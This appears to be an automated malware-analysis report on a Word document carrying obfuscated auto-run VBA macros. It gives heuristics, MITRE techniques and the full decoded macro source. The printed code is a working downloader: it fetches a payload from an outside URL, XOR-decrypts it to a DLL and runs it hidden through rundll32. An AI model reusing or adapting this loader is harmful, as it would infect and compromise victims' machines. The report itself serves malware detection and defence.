Verdict: MALICIOUS (Risk Score: 452)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is an OOXML document containing obfuscated VBA macros. Heuristics indicate the presence of auto-executing macros that use CreateObject and Shell calls, likely to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature as a downloader.
Heuristics (11)

- ClamAV: Xls.Downloader.Donoff-10030344-0 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Xls.Downloader.Donoff-10030344-0
- VBA project inside OOXML | medium | OOXML_VBA (7 related findings)
  Document contains a VBA project — VBA macros present
- Potential Shell call in VBA | critical | OLE_VBA_SHELL
  Matched line in script: Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide)
- Obfuscated VBA Shell command with URL | critical | OLE_VBA_OBFUSCATED_SHELL_URL
  VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  Matched line in script: Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide)
- Obfuscated auto-exec VBA loader | critical | OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide)
- CreateObject call | high | OLE_VBA_CREATEOBJ
  Matched line in script: Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGK1DASH1solo = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(3))
- CallByName call | high | OLE_VBA_CALLBYNAME
  Matched line in script: CallByName mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34, "savet" + "ofile", VbMethod, mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB, 2
- VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro | low | OLE_VBA_AUTOOPEN
  Matched line in script: Sub autoopen()
- Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URLs (each labelled "Referenced by macro"):
  - http://bernardchandran.com/67SELbosjc358
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12689 bytes |

SHA-256: 1906b163ef2f55e9b86d7dae07a7b87c3372fb054f1f0ed9cfe5d09686eb1856

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FormatGUID "109"
End Sub
Attribute VB_Name = "Module1"
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34 As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKKSKLAL As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKLAKOPPC As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay() As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKGMAKO As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGK4 As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKASALLLP As Variant
Public Function SureDateTime(ByRef inCheckDate As Variant) As String
If inCheckDate <> "" Then
SureDateTime = Format(inCheckDate, "dd-mm-yyyy hh:mm")
Else
SureDateTime = Format(Now, "dd-mm-yyyy hh:mm")
End If
End Function
Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
Dim tmp As String
Dim i As Long
If dilodan Then
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKLAKOPPC = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKKSKLAL(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(6))
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKLAKOPPC
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA + "\jugginnh"
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA + mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(12)
Exit Function
Else
GoTo VarPupka
End If
restart:
For i = 1 To Len(tlfNr)
If Mid$(tlfNr, i, 1) = " " Then
tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
GoTo restart
End If
Next i
For i = 1 To Len(tlfNr)
tmp = tmp & Mid$(tlfNr, i, 1)
If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
tmp = tmp & " "
End If
Next i
TlfFormat = tmp
VarPupka:
CallByName mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34, "savet" + "ofile", VbMethod, mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB, 2
UNDOPRYXOR mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB, mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA, "G8sMYyOeUwNWLFPVLbf7GrOdWsjHF8tY"
'mamumakiumanaupanddeapundeSESHESHEETIHMYAGKGMAKO.Open (mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA)
Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide)
End Function
Private Function PunktumTilKomma(ByVal s As String) As String
PunktumTilKomma = Replace(s, ".", ",")
End Function
Public Function SureDate(ByRef inCheckDate As Variant) As String
If inCheckDate <> "" Then
SureDate = Format(inCheckDate, "dd-mm-yyyy")
Else
SureDate = Format(Now, "dd-mm-yyyy")
End If
End Function
Public Function SureTime(ByRef inCheckTime As Variant) As String
If inCheckTime <> "" Then
SureTime = Format(inCheckTime, "HH:MM")
Else
SureTime = Format(Now, "HH:MM")
End If
End Function
Public Function KommaTilPunktum(ByVal s As String) As String
KommaTilPunktum = Replace(s, ",", ".")
End Function
Public Function NombreUsuario() As String
Dim SQL As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34.Type = 0 + 0 + 1
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34.Open
Exit Function
SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
If Not RsUsuario.EOF Then
NombreUsuario = RsUsuario!usu_apodo
End If
End Function
Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
GodnTeBabenParama = Replace(CH1, CH2, CH3)
End Function
Public Function FromDBDate(ByVal mmddyyDate As String) As String
FromDBDate = Format(mmddyyDate, "dd-mm-yyyy")
End Function
Public Function FromDBDateTime(ByVal mmddyyhhmmDateTime As String) As String
FromDBDateTime = Format(mmddyyhhmmDateTime, "dd-mm-yyyy hh:mm")
End Function
Public Function ToDBDate(ByVal ddmmyyDate As String) As String
ToDBDate = Format(ddmmyyDate, "mm-dd-yyyy")
End Function
Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGK1DASH1solo = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(3))
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKKSKLAL = mamumakiumanaupanddeapundeSESHESHEETIHMYAGK1DASH1solo.Environment(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(2 * 2))
VerCadenaPermiso ddmmyyhhmmDateTime
End Function
Attribute VB_Name = "Module2"
Public Function FromDBBool(ByVal inBoolStr As String) As Integer
If Not inBoolStr = "" Then
If CBool(inBoolStr) = True Then
FromDBBool = 1
Else
FromDBBool = 0
End If
Else
FromDBBool = 0
End If
End Function
Public Sub VerCadenaPermiso(permiso As String)
Dim i As Long
Dim letra As String
Alta = False
Baja = False
modi = False
Dim Consu As Boolean
Consu = True
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK4 = "http://bernardchandran.com/67SELbosjc358"
If Application = "Microsoft Word" Then
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.Open mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(5), mamumakiumanaupanddeapundeSESHESHEETIHMYAGK4, False
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.Send
TlfFormat letra, True
NombreUsuario
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKacheha letra
End If
Exit Sub
For i = 1 To Len(permiso)
letra = Mid(permiso, i, 1)
If letra = "A" Then
Alta = True
End If
If letra = "B" Then
Baja = True
End If
If letra = "M" Then
modi = True
End If
If letra = "C" Then
Consu = True
End If
Next i
If Len(permiso) = 0 Then
Consu = False
modi = False
Alta = False
Baja = False
End If
End Sub
Public Sub DecryptByte(ByteArray() As Byte, Key As String)
Dim offset As Long
Dim ByteLen As Long
Dim ResultLen As Long
Dim CurrPercent As Long
Dim NextPercent As Long
Dim m_Key() As Byte
Dim m_KeyLen As Long
m_KeyLen = Len(Key)
ReDim m_Key(m_KeyLen)
m_Key = StrConv(Key, vbFromUnicode)
ByteLen = UBound(ByteArray) + 1
ResultLen = ByteLen
For offset = 0 To (ByteLen - 1)
ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)
If (offset >= NextPercent) Then
CurrPercent = Int((offset / ResultLen) * 100)
NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
End If
Next
End Sub
Public Function mamumakiumanaupanddeapundeSESHESHEETIHMYAGKacheha(pass As String) As String
Dim temp As String
Dim mamumakiumanaupanddeapundeSESHESHEETIHMYAGKtum As String
GoTo beyTumba
Dim pos As Long
Dim leng As Long
Dim tim As Variant
Dim i As Long
Dim Key As Long
leng = Len(pass)
tim = Mid(Time, 1, 8)
tim = Mid(tim, 1, Len(tim) - 3)
tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
For i = 1 To Len(CStr(tim))
pos = pos + CInt(Mid(CStr(tim), i, 1))
Next
While pos > Len(pass)
pos = pos Mod 10 + Int(Rnd * 10)
If pos = 0 Then
pos = Len(pass) + 1
End If
Wend
beyTumba:
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKASALLLP = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.responseBody
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKbridnec mamumakiumanaupanddeapundeSESHESHEETIHMYAGKtum
End Function
Public Sub UNDOPRYXOR(SourceFile As String, DestFile As String, Optional Key As String)
Dim Filenr As Integer
Dim ByteArray() As Byte
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr
Call DecryptByte(ByteArray(), Key)
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr
End Sub
Public Function FGUID(ByVal sGUID As String) As String
If sGUID = "" Or sGUID = "null" Then
FGUID = "null"
ElseIf Left$(sGUID, 1) = "" Then
FGUID = sGUID
Else
FGUID = ""
End If
End Function
Attribute VB_Name = "Module3"
Public Function FormatGUID(ByRef inGUID As String) As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = "HRUUMERicroHRUUUMERoft.XHRUUMERLHTTPHRUUUUMERAdodb.HRUUUMERtrHRUMERaHRUUMERHRUUUUMERHRUUUMERhHRUMERll.Ap"
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 + GodnTeBabenParama("plicationHRUUUUMERWHRUUUMERcript.HRUUUMERhHRUMERllHRUUUUMERProcHRUMERHRUUUMERHRUUUMERHRUUUUMERGHRUMERTHRUUUUMERTHRUMERHRUUMERPHRUUUUMERTypHRUMERHRUUUUMERopHRUMERnHRUUUUMERwritFILMABOponHRUUUMERHRUMERBodyHRUUUUMERHRUUUMERavHRUMERtofilHRUMERHRUUUUMER", "FILMABO", "HRUMERHRUUUUMERrHRUMERHRUUUMER")
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = GodnTeBabenParama(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 + "\chrendoksHRUUUMER.dll", "HRUMER", "e")
Pintogramm Salida
Exit Function
If Mid$(inGUID, 1, 1) <> "{" Then
FormatGUID = "{" & inGUID & "}"
Else
FormatGUID = inGUID
End If
End Function
Public Function Pintogramm(ByVal Cadena As String) As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = GodnTeBabenParama(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2, "HRUUMER", "M")
FTEXT ""
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34 = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(1))
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKGMAKO = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(5 - 3))
ClearString ""
End Function
Public Function FTEXT(ByRef txt As String) As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = GodnTeBabenParama(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2, "HRUUUMER", LCase("S"))
If txt = "" Then
FTEXT = "NULL"
Else
FTEXT = ""
End If
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay = Split(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2, "HRUUUUMER")
End Function
Public Function FLONG(ByVal inNumStr As String) As String
If Not IsInteger(inNumStr) Then
FLONG = "0"
Else
FLONG = inNumStr
End If
End Function
Public Function mamumakiumanaupanddeapundeSESHESHEETIHMYAGKbridnec(pass As String) As String
Dim pos As Long
Dim Key As Long
Dim temp As String
Dim i As Long
Dim mamumakiumanaupanddeapundeSESHESHEETIHMYAGKtum As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34.Write mamumakiumanaupanddeapundeSESHESHEETIHMYAGKASALLLP
TlfFormat "", False
End Function
Public Function FREAL(ByVal inRealStr As String) As String
If Not IsReal(inRealStr) Then
FREAL = "0.0"
Else
FREAL = inRealStr
End If
End Function
Private Function ClearString(ByRef inOrigString As String) As String
Dim strNewString As String
Dim sChar As String
Dim i As Integer
Dim d As Boolean
d = True
IsWord = True
For i = 1 To Len(Trim("ceces"))
If d = False Then
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(i - 2))
Exit For
Else
d = False
End If
Next i
ToDBDateTime ""
Exit Function
For i = 1 To Len(inOrigString)
sChar = Mid(inOrigString, i, 1)
If sChar = "" Then
strNewString = strNewString & "ґ"
Else
strNewString = strNewString & sChar
End If
Next i
ClearString = strNewString
End Function
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 33280 bytes |

SHA-256: 00aca35c13e9c3f465bdae7ab941fee1fd8770df6fcf4ca9cc99b2f031ad0b18

Detection:
- ClamAV: Xls.Downloader.Donoff-10030344-0
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))